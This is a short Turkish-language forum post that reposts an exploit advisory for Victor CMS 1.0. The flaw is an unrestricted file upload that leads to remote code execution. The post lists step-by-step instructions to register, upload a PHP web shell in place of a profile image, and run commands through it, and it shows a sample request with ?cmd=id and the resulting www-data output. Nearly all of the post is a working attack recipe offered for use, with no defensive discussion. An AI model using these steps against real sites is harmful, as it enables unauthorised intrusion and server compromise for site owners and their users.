Hoşgeldin Misafir

Victor CMS 1.0 - File Upload to Remote Code Execution Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Victor CMS 1.0 - File Upload to Remote Code Execution Vulnerability--


Kod:
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
 
# Tested on: Apache2/Linux
 
Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile 
step4: upload imag as php file (upload shell.php)
step5: update user 
step6: You will find your shell in img folder :/path/img/cmd.php
 
http://localhost/CMSsite-master/img/cmd.php?cmd=id
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
#  0day.today [2020-12-23]  #